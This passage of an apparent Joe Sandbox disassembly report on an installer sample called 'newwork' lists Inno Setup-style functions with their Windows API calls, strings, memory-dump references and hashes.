                                                                                • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                • SendNotifyMessageA.USER32(0002047E,00000496,00002710,00000000), ref: 00481A97
                                                                                Strings
                                                                                • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                • Restarting Windows., xrefs: 00481A72
                                                                                • DeinitializeSetup, xrefs: 0048190D
                                                                                • Deinitializing Setup., xrefs: 00481872
                                                                                • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$MessageNotifySend
                                                                                • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3817813901-1884538726
                                                                                • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                • GetActiveWindow.USER32 ref: 0046172B
                                                                                • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                • String ID: A
                                                                                • API String ID: 2684663990-3554254475
                                                                                • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                • API String ID: 884541143-1710247218
                                                                                • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                • API String ID: 190572456-3516654456
                                                                                • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Color$StretchText
                                                                                • String ID:
                                                                                • API String ID: 2984075790-0
                                                                                • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                APIs
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDirectoryHandleSystem
                                                                                • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                • API String ID: 2051275411-1862435767
                                                                                • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Text$Color$Draw$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1005981011-0
                                                                                • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041B745
                                                                                • GetDC.USER32(?), ref: 0041B751
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                • String ID: %H
                                                                                • API String ID: 3275473261-1959103961
                                                                                • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                APIs
                                                                                • GetFocus.USER32 ref: 0041BA17
                                                                                • GetDC.USER32(?), ref: 0041BA23
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                • String ID: %H
                                                                                • API String ID: 3275473261-1959103961
                                                                                • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                APIs
                                                                                  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                Strings
                                                                                • Deleting Uninstall data files., xrefs: 004964FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                • String ID: Deleting Uninstall data files.
                                                                                • API String ID: 1570157960-2568741658
                                                                                • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                Strings
                                                                                • AddFontResource, xrefs: 004702B5
                                                                                • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                • Failed to open Fonts registry key., xrefs: 00470281
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                • API String ID: 955540645-649663873
                                                                                • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                APIs
                                                                                  • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                  • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                  • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                • GetVersion.KERNEL32 ref: 00462E60
                                                                                • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                • String ID: Explorer
                                                                                • API String ID: 2594429197-512347832
                                                                                • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC), ref: 004783CC
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                Strings
                                                                                Memory Dump Source
